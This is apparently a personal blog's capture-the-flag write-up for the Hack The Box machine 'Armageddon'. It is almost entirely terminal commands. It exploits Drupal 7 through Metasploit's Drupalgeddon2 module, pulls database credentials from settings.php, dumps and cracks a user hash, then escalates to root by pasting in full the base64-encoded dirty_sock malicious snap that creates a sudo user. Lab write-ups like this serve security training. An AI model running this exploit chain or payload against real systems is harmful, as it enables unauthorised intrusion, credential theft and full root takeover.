┌──(root💀kali)-[/home/kali/Downloads]

└─# nmap 10.10.10.233

http://10.10.10.233/

Let’s check if we can work a way around the login page!

Exploring, I found that Drupal 7 can be exploited using Metasploit!

┌──(root💀kali)-[/home/kali/Downloads]

└─# msfconsole

msf6 > search drupal

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.10.233

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 10.10.14.35

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

cat settings.php

‘username’ => ‘drupaluser’,

‘password’ => ‘CQHEy@9M*m23gBVj’,

mysql -u drupaluser -p -e ‘show databases;’

mysql -u drupaluser -p -D ‘drupal’ -e ‘show tables;’

mysql -u drupaluser -p -D ‘drupal’ -e ‘select * from users;’

Output:

brucetherealadmin       $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt

┌──(root💀kali)-[/home/kali/Downloads]

└─# john hash –wordlist=rockyou.txt

Output: booboo

──(root💀kali)-[/home/kali/Downloads]

└─# ssh brucetherealadmin@10.10.10.233

User.txt: ae611d2c546da871XXXXXXXXXXXXXX

[brucetherealadmin@armageddon ~]$ python –version

https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py

https://gitlab.com/tamilcode/dirty-sock-exploit/-/blob/main/dirty_sock_exploit

[brucetherealadmin@armageddon /]$ cd tmp[brucetherealadmin@armageddon tmp]$ python2 -c ‘print “aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw” + “A”*4256 + “==”‘ | base64 -d > dedsec.sna

[brucetherealadmin@armageddon tmp]$ sudo /usr/bin/snap install –devmode dedsec.snap

[brucetherealadmin@armageddon tmp]$ cat /etc/passwd

Username: dirty_sock

Password: dirty_sock

[brucetherealadmin@armageddon tmp]$ su dirty_sock

[dirty_sock@armageddon tmp]$ sudo –i

[root@armageddon ~]# cd /root

[root@armageddon ~]# cat root.txt

Root.txt: 7e815792cbddaf2XXXXXXXXXXXXXXXXXXXX

Hi, I’m saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *